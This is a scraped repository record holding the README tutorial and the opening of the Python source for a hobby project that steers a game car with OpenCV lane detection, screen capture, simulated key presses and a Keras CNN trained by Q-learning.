decrease_health(self, factor= 1):\n self.mp -= 1 * factor\n" } ]
4
nikkkkhil/self-driving-car-simulation-using-CNN
https://github.com/nikkkkhil/self-driving-car-simulation-using-CNN
8e192d61cf56f3f743b9c537aa47119fe79776ef
5f41888f55d128c89f834c0c94124216bb201ae2
43757cfd36aadd2e617fa74c99ebdb1ef1f45889
refs/heads/master
2020-08-03T17:04:40.027681
2019-09-30T09:17:12
2019-09-30T09:17:12
211,822,035
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6690725684165955, "alphanum_fraction": 0.7035109996795654, "avg_line_length": 61.71052551269531, "blob_id": "fe316273621c76a899476616e74c50c7386fd3f7", "content_id": "d94990a0a69942a87edb52c3b4cfb39db7b1902f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35745, "license_type": "no_license", "max_line_length": 575, "num_lines": 570, "path": "/README.md", "repo_name": "nikkkkhil/self-driving-car-simulation-using-CNN", "src_encoding": "UTF-8", "text": "# Self-Driving-Car-3D-Simulator-With-CNN\n<p>\n <img align=\"left\" width=\"425\" height=\"400\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/3D%20Car%20Simulator.png\">\n <img align=\"right\" width=\"420\" height=\"400\" src=\"https://upload.wikimedia.org/wikipedia/commons/thumb/0/0a/Python.svg/2000px-Python.svg.png\">\n</p>\n<p>\n <img align=\"center\" width=\"600\" height=\"7\" src=\"http://getthedrift.com/wp-content/uploads/2015/06/White-Space.png\">\n</p>\n\n## Introduction\n<p align=\"center\">\n Self Driving car after 50 epochs of training<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/SelfDrivingAfter50Epochs.gif\">\n</p>\n\nSome point in our life as programmers we all wonder how a self driving car is actually programmed. I went through the same phase and so here it is, a very simple DIGITAL self driving car controlled using Python with a Reinforcement Q-learning algorithm as well as a Convolutional Neural Network.\n\nYou can essentially apply this to any game, the algorithm can be adapted and the reward rules can be changed to allow for different outcomes. As we go through the code I will explain step by step what each line does and once you've mastered it you can go ahead fork the code and do as you wish.\n\n```\nNote: You need to have sufficient knowledge about Reinforcment learning before progressing, this tutorial \nonly explains the code it does not go into the theoretical details\nThe links below help explain the theoretical details as well as other details I had problems with:\n\nhttps://stats.stackexchange.com/questions/221402/understanding-the-role-of-the-discount-factor-in-reinforcement-learning\nhttp://mnemstudio.org/path-finding-q-learning-tutorial.htm\nhttps://yanpanlau.github.io/2016/07/10/FlappyBird-Keras.html\nhttps://keon.io/deep-q-learning/\nhttps://en.wikipedia.org/wiki/Q-learning\nhttps://medium.com/emergent-future/simple-reinforcement-learning-with-tensorflow-part-0-q-learning-with-tables-and-neural-networks-d195264329d0\n```\n\nWe will be using Keras to make the magic happen with Tensorflow backend. Assuming you are familiar with Keras and Tensorflow and have them installed we can start!\n\n```\nNote: Check my other gits for brief explanation on Keras and other simple algorithms such as the CNN \nand RNN if you are unfamiliar with Keras/Tensorflow!\n```\n\n## My Setup\n\nIn order to detect lanes, we need to send game frames to the algorithm for processing. I used a library called [mss](https://pypi.python.org/pypi/mss/)(MultipleScreenShot), it allows the users to take quick screenshots with almost minimal effect in FPS.\nUnfortunately, it takes the screen shot of the entire screen if coordinates aren't specified, therefore in order to get game frames, the game needs to be properly positioned. 
\n\nThe picture below depicts my environment.\n\n<p align=\"center\">\n Layout as displayed on my screen\n <img width=\"800\" height=\"600\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/Environment.png\">\n</p>\n<p>\n <img width=\"600\" height=\"4\" src=\"http://getthedrift.com/wp-content/uploads/2015/06/White-Space.png\">\n</p>\nYou can set it up anyway you want but make sure to change the coordinates of the ScreenShot module so it only covers the game area.\n\nBefore we start the implementation it's a good idea to have the code open on the side as the comments have details you wouldn't want to miss.\n\n## Implementation\n\n### Imports\n```python\n1 import cv2\n2 import mss\n3 import numpy as np\n4 from keras.models import Sequential\n5 from keras.layers import Dense, Flatten\n6 from keras.optimizers import SGD\n7 from keras.layers.convolutional import Conv2D\n8 import pyautogui as p\n9 import random\n10 import time\n```\nWe start by importing a couple libraries. \nIn order, we import OpenCV, our Mss library, Numpy for computation, Keras for our CNN, Pyautogui to control our keyboard, Random and finally Time for delay purposes.\n\n### Detecting Lanes\n```python\n1 #Function calculates the lanes\n2 def CalculateLanes(OrgImage):\n3 errors = False\n4 #Since our game has yellow lanes, we can detect a specific color\n5 #keep that color, and get rid of everything else to make it easier\n6 #to detect the yellow lanes\n7 #So we convert our image to the HSL color scheme\n8 HSLImg = cv2.cvtColor(OrgImage, cv2.COLOR_BGR2HLS)\n9 #The lower and upper arrays define boundaries of the BGR color space\n10 #BGR because OpenCV represents images in Numpy in reverse order\n11 #So for our yellow color we say that our pixels color that are yellow will be\n12 # R>= 100, B >= 0, G>=10 (lower limit), R<=255, B<=255, G<=40\n13 lower = np.uint8([ 10, 0, 100])\n14 upper = np.uint8([ 40, 255, 255])\n15 #inRange basically finds the color we want in the HLSImg with the lower and upper\n16 #boundaries(the ranges)\n17 yellow_mask = cv2.inRange(HSLImg, lower, upper)\n18 #We then apply this mask to our original image, and this returns an image showing\n19 #only the pixels that fall in the range of that mask\n20 YellowImg = cv2.bitwise_and(OrgImage, OrgImage, mask=yellow_mask)\n21 #Convert the original image to gray\n22 GrayImg = cv2.cvtColor(YellowImg, cv2.COLOR_BGR2GRAY)\n23 #Apply blurring\n24 #The 5x5 is the gaussianblur kernel convolved with image\n25 #The 0 is the sigmaX and SigmaY standard deviation usually taken as 0\n26 blurredImg = cv2.GaussianBlur(GrayImg, (5, 5), 0)\n27 #Detect edges in the image\n28 #700 is the max val, any edges above the intensity gradient of 700 are edges\n29 #200 is the lowest intensity gradient, anything below is not an edge\n30 imageWithEdges = cv2.Canny(blurredImg, threshold1=200, threshold2=700)\n31 #These are the points of our trapezoid/hexagon that we crop out \n32 points = np.array([[0, 310],[0, 300], [220, 210], [380, 210], [600, 300], [600, 310]])\n33 #Now we calculate the region of interest\n35 #We first create a mask (a blank black array same size as our image)\n36 mask = np.zeros_like(imageWithEdges)\n37 #Then we fill the mask underneath the points(inside the polygon) we defined\n38 #with color white (255)(This is the part of the image we want to process)\n39 cv2.fillPoly(mask, [points], 255)\n40 #this bitwise and function basically combines the two images\n41 #The coloured bit where the pixels had a value 255 is kept while the\n42 #top 
bit is removed (which is 0)\n43 croppedImg = cv2.bitwise_and(blurredImg, mask)\n```\n**Line 2** Our parameter being our screen shot (OrgImage)\n\n**Line 3** We initialise our variable errors to False indicating that currently we have no errors produced\n\n**Line 8** The lanes in the game are yellow and so we convert our image to the HSL color space in order to enhance our lanes.\nThey were not very clear in the RGB space, therefore HSL was used.\n\n**Line 13&14** We define our upper and lower limit of the color space. Although the boundaries are given in terms of RGB it is actually in HSL. The comments are in RGB to make it easier to understand. Those limits represent the region where the color yellow falls within. Therefore, we use those limits so we can seek out a similar color.\n\n**Line 17** Now we apply the limits to our HSL image. It seeks out the color yellow and sets the rest of the pixels of the image to 0. We have essentially created a mask. An area where relevant pixels keep their values and the ones not needed are set to 0. \n\n**Line 20** The bitwise_and function basically takes a look at the pixel values and if the pixel value in the mask and the pixel value in the image have the same value they are kept, if they are different then it is set to 0. We are left with a image with only yellow region visible.\n\n<p align=\"center\">\n Yellow Image<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/YellowImg.png\">\n</p>\n\n**Line 22** Now we can convert our image to grayscale. We do this in order to make the edge detection more accurate. The canny edge detection function used later on essentially measures the magnitude of pixel intensity changes. Therefore if we have colors that are similar to each other there isn't a big change in pixel intensity and it might not be considered an edge. Grayscale images are also less computation heavy.\n\n**Line 26** We now apply a gaussian blur. We do this in order to get rid of rough edges. Some realistic games or even in real life there are cracks on the road that might be considered something of interest so in order to get rid of the \"noisy edges\" we apply a blur.\n\n**Line 30** Now we finally apply the edge detection function. We have thresholds that identify what can and cannot be considered an edge.\n\n**Line 32** We don't want all the edges detected in the image. We only want those that concern the lanes. So we create a region of interest, a specific set of coordinates. \n\n**Line 36** We create an empty black mask with the same space dimension as our image.\n\n**Line 39** Anything around the polygon defined by our ROI is filled with black while the inside is filled with the color white (255).\n\n**Line 43** Finally we take our blurred image and we apply our mask to it. So the white region of our mask is replaced with our image while the rest is black (not used).\n\n<p align=\"center\">\n croppedImg<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/croppedImg.png\">\n</p>\n\nGreat now we've managed to narrow down our edges to the region that we are interested in. Thats most of the processing done. We now want to get the appropriate lines and combine them into lanes. 
The next half of this function does exactly that.\n\n```python\n1 #Basically the accumulation of the most imperfect edges with the minimum\n2 #length being defined by 180\n3 #Thickness of the lines is 5\n4 lines = cv2.HoughLinesP(croppedImg, 1, np.pi/180, 180, np.array([]), 180, 5)\n5 #Now we need to find the slope, intercept and length of each of our detected lines\n6 left_lines = []\n7 length_left = []\n8 right_lines = []\n9 length_right = []\n10 #We may not always detect a line that is why we do try/except statement\n11 try:\n12 for line in lines:\n13 #Coordinates of a single line\n14 for x1, y1, x2, y2 in line:\n15 #We dont want a vertical line or a horizontal line\n16 if x1==x2 or y1==y2:\n17 continue\n18 #Slope formula\n19 slope = (y2-y1)/(x2-x1)\n20 #Intercept\n21 intercept = y1 - slope*x1\n22 #Length\n23 length = np.sqrt((y2-y1)**2+(x2-x1)**2)\n24 #Y is reversed in images therefore a negative slope is a left line not right\n25 if slope<0:\n26 left_lines.append((slope, intercept))\n27 length_left.append((length))\n28 else:\n29 right_lines.append((slope, intercept))\n30 length_right.append((length))\n31 #Now we have collected our similar lines into right and left lists\n32 #Now we can convert them into lanes by dot product all the similar lines with lengths\n33 #The longer lines are weighted more therefore affect the lanes more\n34 #Then we normalise them by dividing by sum of the lengths(sort of like averaginng)\n35 left_lane = np.dot(length_left, left_lines) /np.sum(length_left) if len(length_left) >0 else None\n36 right_lane = np.dot(length_right, right_lines)/np.sum(length_right) if len(length_right)>0 else None\n37 #Now we have the right LANE and the left LANE through averaging and dot product\n38 #Now we need to convert them back into coordinates for pixel points\n39 #Having an equation of a line (assume infinite) we can select arbitrary points and find\n40 #the x or y value accordingly.\n41 #So we select arbitrary points for y1 = croppedImg.shape[0]\n42 #and for y2 = y1*0.6, We need this in order to draw our lines (converting to pixel coordinates)\n43 #We all need them to be int so cv2.line can use them\n44 LeftX1 = int((croppedImg.shape[0] - left_lane[1])/left_lane[0])\n45 LeftX2 = int(((croppedImg.shape[0]*0.6) - left_lane[1])/left_lane[0])\n46 RightX1 = int((croppedImg.shape[0] - right_lane[1])/right_lane[0])\n47 RightX2 = int(((croppedImg.shape[0]*0.6) - right_lane[1])/right_lane[0])\n48 left_lane = ((LeftX1, int(croppedImg.shape[0])), (LeftX2, int(croppedImg.shape[0]*0.6)))\n49 right_lane = ((RightX1, int(croppedImg.shape[0])), (RightX2, int(croppedImg.shape[0]*0.6)))\n50 #Now we can draw them on the image\n51 #We first create an empty array like our original image\n52 #Then we draw the lines on the empty image and finally combine with our original image\n53 emptImg = np.zeros_like(OrgImage)\n54 #[255, 0, 0,]is the color, 20 is the thickness\n55 #The star allows us to input a tuple (it processes as integer points)\n56 cv2.line(emptImg, *left_lane, [255, 0, 0], 20)\n57 cv2.line(emptImg, *right_lane, [255, 0, 0], 20)\n58 #Finally we combine the two images\n59 #It calculates the weighted sum of two arrays\n60 #1.0 is the weight of our original image, we don't want to amplify it\n61 #0.95 is the weight of our lines, and 0.0 is the scalar added to the sum\n62 #be very significant in the image, just enough so we can see it and not obstruct anything else\n63 finalImg = cv2.addWeighted(OrgImage, 1.0, emptImg, 0.95, 0.0)\n64 except:\n65 errors = True\n66 print(\"Nothing 
detected\")\n67 #If we dont detect anything or to avoid errors we simply return the original image\n68 return OrgImage, errors\n69 #If all goes well, we return the image with the detected lanes\n70 return finalImg, errors\n```\n**Line 6-Line 9** We initiate empty lists for our data. Left and right lines and their corresponding lengths. \n\n**Line 4** The function HoughLines is quite difficult to understand. In layman term it is simply detecting lines in our region and returning coordinates. We set a threshold of 180 the length, and the thickness being 5. To find out more about hough transformation, go to this [link](http://www.swarthmore.edu/NatSci/mzucker1/opencv-2.4.10-docs/doc/tutorials/imgproc/imgtrans/hough_lines/hough_lines.html)\n\n**Line 12-Line 30** Looping over all the detected lines we take one line at a time and we calculate the intercept and the slope. We omit horizontal and vertical lines as our lanes will never be straight in that perspective. Finally, depending on the slope we append our lines accordingly to the right and left lanes.\n\n**Line 35-Line 36** We want to combine all our lines into lanes. We compute the dot product of the lines and their respective lengths. Longer lines have a heavier effect and so the slopes and intercepts of those line will be more dominant. Finally divide by the lengths to essentially normalise the values(So it can be mapped to the image)\n\n**Line 44-Line 47** We have the lanes, but in order to draw them we need coordinates. To draw any line (assuming infinite) any arbitrary point can be used. Using the arbitrary y values I calculate the x values.\n\n**Line 48-Line49** Now we just group those points accordingly to the right and left lanes.\n\n**Line 53** We want to draw the line on top of our image. But in order to do that we need to have an overlay image. So here, we create an empty image with the same space dimensions as our original. \n\n**Line 56-Line 57** Then we draw our lines on our empty image. The color used is blue as the format is BGR and not RGB.\n\n**Line 63** Finally we combine the two images. This is done by calculating the weighted sum of the two arrays of images. In our empty image most of the pixels are set to 0 and so only the lane pixels will be effected.\n\n**Line 65-Line 68** If any errors or a lane wasn't detected then we simply just output our original image.\n\n**Line 70** If all goes well, we output our final processed image.\n\n<p align=\"center\">\n finalImg<br>\n <img width=\"400\" height=\"300\" src=\"https://github.com/sagar448/Self-Driving-Car-3D-Simulator-With-CNN/blob/master/src/finalImg.png\">\n</p>\n\nNow we can go ahead and explore the next part of the code. 
The next part explains how to format our processed images so it could be accepted by our Keras CNN.\n\n```python\n1 #Processes the images and returns the required data\n2 def getFrames():\n3 #We initialise the mss screenshot library\n4 sct = mss.mss()\n5 #This essentially takes a screenshot of the square from the coordinates\n6 #You can adjust these to your liking, \n7 game = {'top': 122, 'left': 0, 'width': 512, 'height': 286}\n8 #This converts the screenshot into a numpy array\n9 gameImg = np.array(sct.grab(game))\n10 #We want to resize the array so we can easily display it\n11 gameImg = cv2.resize(gameImg, (600, 400))\n12 #We pass the array into our calculateLanes function\n13 #it returns our detected lanes image as well as if any errors were produced\n14 img, errors = CalculateLanes(gameImg)\n15 #You can show the render if you want with the lanes detections\n16 cv2.imshow('window', img)\n17 #To further process the image we convert it to a grayscale\n18 img = cv2.cvtColor(cv2.resize(img, (84, 84)), cv2.COLOR_BGR2GRAY)\n19 #In order for Keras to accept data we reshape it into the specific format\n20 #I want to use an image thats 84x84\n21 img = img.reshape(1, 84, 84)\n22 #In order to give the algorithm the feel of the \"velocity\" we stack the 4 images\n23 input_img = np.stack((img, img, img, img), axis = 3)\n24 #This is required for openCV as a failsafe for stopping render\n25 #By pressing q, you can stop render\n26 if cv2.waitKey(25) & 0xFF == ord('q'):\n27 cv2.destroyAllWindows()\n28 #If all goes well we return the input_img and the errors\n29 return input_img, errors\n```\n**Line 2** This function essentially processes our screenshots using the lane detection function and then formats the image data so we can then use it with our CNN.\n\n**Line 4** We initialise our screenshot library here.\n\n**Line 7** Game stores the dimensions of our screenshots. It represents the area of the screen we took the screenshot of.\n\n**Line 9** We convert it to a numpy array for further processing.\n\n**Line 11** I resized the image so when we display it, it can fit on the screen. Note, if you change the size of the screen you will need to edit the coordinates of the ROI mask in the lane detection function in order to account for the size increase or decrease.\n\n**Line 14** We now call the CalculateLane() function passing the resized game screenshot as a paramter. It returns either the original image back to us or it returns our image with detected lanes. \n\n**Line 16** You can choose to render your detection but it will slow down the process quite a bit.\n\n**Line 18** We can now start formatting our image for our CNN. Our first step is to resize it to a suitable size for the CNN to process as well as to convert it to grayscale.\n\n**Line 21** Since Keras needs a specific dimension we reshape our image to 1x84x84. The 1 is essentially the batch number.\n\n**Line 23** The CNN needs to make logical decisions. Therefore, without any sense of velocity the CNN cannot perform. In order to provide the CNN with some sense of velocity we stack our images. Thus, our dimension of our input is now (1, 84, 84, 4).\n\n**Line 26-Line 27** If you've ever used OpenCV and decided to display your image/video then you know to always put this at the end or the image/video will not display.\n\n**Line 29** Finally, we return our input and errors (Errors for the CalculateLanes function)\n\nThat takes care of all the image processing. 
We can now go ahead and start taking a look at function that controls our car in game.\n\n```python\n#This function makes the car accelerate\ndef straight():\n p.keyDown(\"up\")\n p.keyUp(\"up\")\n\n#We can turn right with this\ndef right():\n p.keyDown(\"right\")\n p.keyUp(\"right\")\n\n#Turn left with this\ndef left():\n p.keyDown(\"left\")\n p.keyUp(\"left\")\n```\n**Function straight()** Key Down function presses the specific key on our keyboard. KeyUp is important as KeyDown holds the key, so we need to release it. This function is responsible for accelerating our car.\n\n**Function right()** Turns our car to the right.\n\n**Function left()** Turns our car to the left.\n\nWe are now ready to start building our CNN model. Our model will be quite similar to the other CNN models in the past, we will try to map our image data to the actions.\n```python\n1 #For now we make the car accelerate, turn right and turn left\n2 moves = 3\n3 #learning rate (discount rate)\n4 learningRate = 0.9\n5 #This is the exploration rate (epsilon)\n6 #Its better at first to let the model try everything\n7 epsilon = 1.0\n8 #We don't want our model to stop exploring so we set a minimum epsilon\n9 epsilon_min = 0.01\n10 #We also dont want our model to explore all the time therefore we want it\n11 #to decay\n12 epsilon_decay = 0.995\n13 #Number of times we want to train the algorithm (The number of games)\n14 epochs = 100\n15 #We want to store our data for our replay so our model can remember the past experiences\n16 memory = []\n17 #The max amount of stuff we want to remember\n18 max_memory = 500\n19\n20 #Lets start defining our model\n21 model = Sequential()\n22 #We will be using a CNN with 32 filters, 3x3 kernel and the input shape will be\n23 #84x84 with 4 grayscale images stacked on top\n24 #padding will be set as same(padding with 0) and we will use the rectified activation function\n25 model.add(Conv2D(32, (3, 3), input_shape=(84, 84, 4), padding='same',\n26 activation='relu'))\n27 #This time we will use 64 filters with a 3x3 kernel, with the same act function \n28 #but the padding will change\n29 model.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n30 model.add(Conv2D(64, (3, 3), activation='relu', padding='valid'))\n31 #We flatten our data in order to feed it through the dense(output) layer\n32 model.add(Flatten())\n33 model.add(Dense(512, activation='relu'))\n34 #We have 3 outputs, forward, left, right\n35 model.add(Dense(3, activation='linear'))\n36 #We will be using the mean squared error\n37 model.compile(loss='mean_squared_error',\n38 optimizer=SGD())\n```\n**Line 2** As shown in the code above, our car can do 3 things. Accelerate, turn right and turn left. Thus we set our moves variable to 3.\n\n**Line 4** This is our discount rate. We want our immediate reward to be worth more than our future reward therefore we discount the future reward in order make the current reward stand out. This is because our model is uncertain what the next step may be. (More on this later)\n\n**Line 7** This is the exploration rate. We want our algorithm to start off by trying different actions.\n\n**Line 9** We don't want our model to ever stop trying random actions so we set our minimum exploration rate.\n\n**Line 12** This is the rate at which our exploration factor decays.\n\n**Line 14** This is the number of games we want to play in total.\n\n**Line 16** All the games ever played go in here. 
We want our model to learn from its mistakes.\n\n**Line 18** We don't want to store too many games as it becomes computation heavy.\n\nNow we can start building our actual CNN model.\n\n**Line 21** We initialise our machine learning algorithm.\n\n**Line 25** This is our first convolutional layer. We want to output 32 filters with a 3x3 kernel and our input shape will be 84x84x4. We set our activation function to rectified linear unit.\n\n**Line 29-Line 30** We add another two convolutional layers for better accuracy.\n\n**Line 32-Line 33** We flatten our data so we can put it through a hidden layer of a simple neural network.\n\n**Line 35** This is the final output layer with 3 nodes. It calculates the probability of our 3 actions. \n\n**Line 37** Configuration for our loss and optimisation function. \n\nFinally, we've reached the last step of the tutorial, our Q-Learning algorithm. The brain and heart of the algorithm. This algorithm decides the actions to take and essentially trains our car to be a better driver.\n```python\n1 #loop over the number of epochs (essentially the number of games)\n2 for i in range(epochs):\n3 #time.sleep(5)\n4 #We set the game_over to false as the game is just starting\n5 game_over = False\n6 #We start of by getting initial frames and errors\n7 input_img, errors = getFrames()\n8 #We set the errors to false to begin with\n9 errors = False\n10 #We set the reward to 0\n11 reward = 0\n12 #While the game is not over we loop\n13 while game_over==False:\n14 #Np.random.rand() returns a number between 0 and 1\n15 #We check if its smaller that our exploration factor\n16 if np.random.rand() <= epsilon:\n17 #if the random number is smaller than our exploration factor\n18 #We select a random action from our 3 actions\n19 action = np.random.randint(0, moves, size=1)[0]\n20 else:\n21 #If it's not smaller than we predict an output by inputting our\n22 #4 stacked images\n23 #ouput is the probability of our 3 directions\n24 output = model.predict(input_img)\n25 #action is the index of the highest probability and therefore\n26 #indicates which turn to take\n27 action = np.argmax(output[0])\n28 #if our action == 0 then we go straight \n29 if int(action) == 0:\n30 straight()\n31 #If our action == 1 then we go right\n32 elif int(action) == 1:\n33 right()\n34 #else we go left\n35 else:\n36 left()\n```\n**Line 2** We loop over the amount of games we want to play. In this case I have set the epochs to 100. \n\n**Line 3** Originally I had left the time.sleep in the program as this allowed me to prepare for the start of the algorithm but it also slows down the learning stage therefore it is commented out.\n\n**Line 5** The AI is about to start playing the game so we originally set the game_over to false. We will need it later.\n\n**Line 7** We start by getting the initial \"state\" of the algorithm. We will need this to predict our corresponding action.\n\n**Line 9** Despite the error in **Line 7** we set our errors to false as errors at the start do not matter, the algorithm will be performing a random action to begin with. \n\n**Line 11** Initialise our Rewards variable to 0.\n\n**Line 13** Looping for one game, while the game isn't false\n\n**Line 16-Line 19** We start off by checking if our exploration is bigger than a random number between 0 and 1. At the begining it will be and so we select a random action from our 3 actions. \n\n**Line 20-Line 27** Once our exploration rate is low enough, we can start predicting our actions. 
Output stores a numpy array of size 3 produced by the prediction from our input image. Action stores the index of the maximum probability.\n\n**Line 29-Line 36** Based on our predicted or random action we select one of the functions to run that controls our car. \n\nHalfway through! From here we can now actually start studying the bulk of the Q-learning algorithm!\n```python\n1 #Once we've performed our action we get the next frame\n2 #We also check weather to reward the algorithm or not\n3 input_next_img, errors = getFrames()\n4 #If we detect lanes and therefore no errors occur we reward the algorithm\n5 if errors == False:\n6 reward = 1\n7 #Else if there we detect no lanes and so there is an error we \n8 #say its game over\n9 else:\n10 reward = 0\n11 game_over = True\n12 #Game over or not we want to keep record of the steps the algo took\n13 #We first check if the total memory length is bigger than the max memory\n14 if len(memory) >= max_memory:\n15 #If more memory then needed we delete the first ever element we added\n16 del memory[0]\n17 #We append it to our memory list\n18 memory.append((input_img, action, reward, input_next_img, game_over))\n19 #Next we set our input_img to our latest data\n20 input_img = input_next_img\n21 if game_over:\n22 print(\"Game: {}/{}, Total Reward: {}\".format(i, epochs, reward))\n23 #Once the game is over we want to train our algo with the data we just collected\n24 #We check if our memory length is bigger than our batch size \n25 if len(memory) > 32:\n26 #If so then we set the batch_size to 32\n27 batch_size = 32\n28 else:\n29 #Else we set our batch size to whatever is in the memory\n30 batch_size = len(memory)\n31 #We are taking a random sample of 32 so not to overfit our algo\n32 batch = random.sample(memory, batch_size)\n33 #We itereate over every memory we've stored in that memory batch of 32\n34 for input_img, action, reward, input_next_img, game_over in batch:\n35 #if in that memory our game was over then we set the target_reward equal to reward\n36 target_reward = reward\n37 #If our game was not over\n38 if game_over == False:\n39 #This essentially is the bellman equation\n40 #expected long-term reward for a given action is equal to the \n41 #immediate reward from the current action combined with the expected \n42 #reward from the best future action taken at the following state.\n43 #The model isn't certain that for that specific action it will get the best reward\n44 #It's based on probability of the action, if the probability of that action is in the\n45 #negatives then our future reward is going to be further decreased by our learning rate\n46 #This is just the model being cautious, as to not set an impossible reward target\n47 #If the reward is impossible then the algorithm might not converge\n48 #Converge as in a stable condition where it can play the game without messing up\n49 target_reward = reward + learningRate * \\\n50 np.amax(model.predict(input_next_img)[0])\n51 #So from above we essentially know what is going to happen(input_next_img) \n52 #assuming the game wasn't over, the algorithm did well.\n53 #So we want the algorithm to perform the same, essentially we\n54 #persuade the algorithm to do what it did to get that reward\n55 #so we make the algorithm predict from the previous frame(input_img)\n56 #but we alter its prediction according to the action that got the highest\n57 #reward and...\n58 desired_target = model.predict(input_img)\n59 #we set that as the target_reward...\n60 desired_target[0][action] = target_reward\n61 #So to 
make the algo perform the same, we associate the input_img with the\n62 #target we want and we fit it\n63 model.fit(input_img, desired_target, epochs=1, verbose=0)\n64 #Finally we check if our exploration factor is bigger than our minimum exploration\n65 #if so we decrease it by the decay to reduce exploration, we do this every game\n66 if epsilon > epsilon_min:\n67 epsilon *= epsilon_decay\n```\n**Line 3** After the action we get our next frame, and errors if any.\n\n**Line 5-Line 6** After the action has been performed and we have the next frame with calculated lanes and it does not return any errors then we set the reward to 1.\n\n**Line 9-Line 11** If it does return errors then we say that the game is over. I have set it up like that so the algorithm can learn to drive within lanes. The error is associated with either the lanes not being detected or simply because the car was not within any lanes to detect. The latter being more probable and thus provides reason for the specific guidelines. I also set the reward to 0 as the algorithm fails to achieve its goal\n\n**Line 14-Line 16** Regardless the status of the game_over variable, we want to record the gameplay that happened. This enables the algorithm to learn from it's mistakes. So in this piece of code, we check whether the memory is full or not, if so we delete the very first item appended.\n\n**Line 18** We append to the memory array.\n\n**Line 20** We set our next set of frames to our current set of frames. Essentially progressing our variable input_img to the next undecided action frame.\n\n**Line 21-Line 22** If game was over we print out our statistics. \n\n**Line 25-Line 30** This simply put is the setup for our replay section of the Q-algorithm. We want to select random sample of batches to train our algorithm with. Our default batch size is 32, but at the begining there wouldn't be enough to sample 32 batches. Therefore, we train the algorithm with the whole memory array.\n\n**Line 34-Line 36** Iterating over our memory, we begin by setting our target reward to our reward in the first sample memory. \n\n**Line 38-Line 50** In that memory if our game wasn't over than that means our algorithm performed well. So we want to persuade our algorithm to do the same thing in the future. Therefore we set our future reward (target reward) to the current reward from the current action combined with the expected reward from the best future action taken at the following state. We multiply by our learningRate to avoid converging problems. We are essentially increasing the probability of our desired action.\n\n**Line 58** Here we ask the algorithm again what it might predict for the previous state.\n\n**Line 60** We manipulate the prediction, we take the prediction and insert our own probability of our corresponding action. Simply telling the algorithm that for a situation like this we want this action to be performed.\n\n**Line 63** We feed the manipulations and the results into our model to train it for a single epoch.\n\n**Line 66-Line 67** Finally, after everything is done, we decrease our exploration rate by multiplying our epsilon with our epsilon decay rate.\n\n## Conclusion\n\nWell thats it for the self driving car! You can definitely make your algorithm more complex by adding different directions, making your convolutional layers deeper etc. You can even apply this to another car game, create your own guidelines and own methods of rewards! If there are any question please don't hesitate to contact me, I am happy to help. 
I am open to feedback and different ways in which I could improve this, maybe you have a better way of doing this. Other than any questions, if you find a mistake while reading through this please let me know! Happy coding!\n" }, { "alpha_fraction": 0.6359937787055969, "alphanum_fraction": 0.6588531732559204, "avg_line_length": 48.13333511352539, "blob_id": "33d9af7bc87a716ba7dced966908c033449cccc7", "content_id": "b3dc92fcb7df91e7860edbc9148e7080053c1479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15486, "license_type": "no_license", "max_line_length": 108, "num_lines": 315, "path": "/SelfDrivingCarWithNN.py", "repo_name": "nikkkkhil/self-driving-car-simulation-using-CNN", "src_encoding": "UTF-8", "text": "# =============================================================================\n# Written by Sagar Jaiswal\n# =============================================================================\nimport cv2\nimport mss\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\nfrom keras.optimizers import SGD\nfrom keras.layers.convolutional import Conv2D\nimport pyautogui as p\nimport random\nimport time\n\n#Function calculates the lanes\ndef CalculateLanes(OrgImage):\n errors = False\n #Since our game has yellow lanes, we can detect a specific color\n #keep that color, and get rid of everything else to make it easier\n #to detect the yellow lanes\n #So we convert our image to the HLS color scheme\n HLSImg = cv2.cvtColor(OrgImage, cv2.COLOR_BGR2HLS)\n #The lower and upper arrays define boundaries of the BGR color space\n #BGR because OpenCV represents images in Numpy in reverse order\n #So for our yellow color we say that our pixels color that are yellow will be\n # R>= 100, B >= 0, G>=10 (lower limit), R<=255, B<=255, G<=40\n lower = np.uint8([ 10, 0, 100])\n upper = np.uint8([ 40, 255, 255])\n #inRange basically finds the color we want in the HLSImg with the lower and upper\n #boundaries(the ranges)\n yellow_mask = cv2.inRange(HLSImg, lower, upper)\n #We then apply this mask to our original image, and this returns an image showing\n #only the pixels that fall in the range of that mask\n YellowImg = cv2.bitwise_and(OrgImage, OrgImage, mask=yellow_mask)\n #Convert the original image to gray\n GrayImg = cv2.cvtColor(YellowImg, cv2.COLOR_BGR2GRAY)\n #Apply blurring\n #The 5x5 is the gaussianblur kernel convolved with image\n #The 0 is the sigmaX and SigmaY standard deviation usually taken as 0\n blurredImg = cv2.GaussianBlur(GrayImg, (5, 5), 0)\n #Detect edges in the image\n #700 is the max val, any edges above the intensity gradient of 700 are edges\n #200 is the lowest intensity gradient, anything below is not an edge\n imageWithEdges = cv2.Canny(blurredImg, threshold1=200, threshold2=700)\n #These are the points of our trapezoid/hexagon that we crop out \n points = np.array([[0, 310],[0, 300], [220, 210], [380, 210], [600, 300], [600, 310]])\n #Now we calculate the region of interest\n #We first create a mask (a blank black array same size as our image)\n mask = np.zeros_like(imageWithEdges)\n #Then we fill the mask underneath the points(inside the polygon) we defined\n #with color white (255)(This is the part of the image we want to process)\n cv2.fillPoly(mask, [points], 255)\n #this bitwise and function basically combines the two images\n #The coloured bit where the pixels had a value 255 is kept while the\n #top bit is removed (which is 0)\n croppedImg = cv2.bitwise_and(blurredImg, 
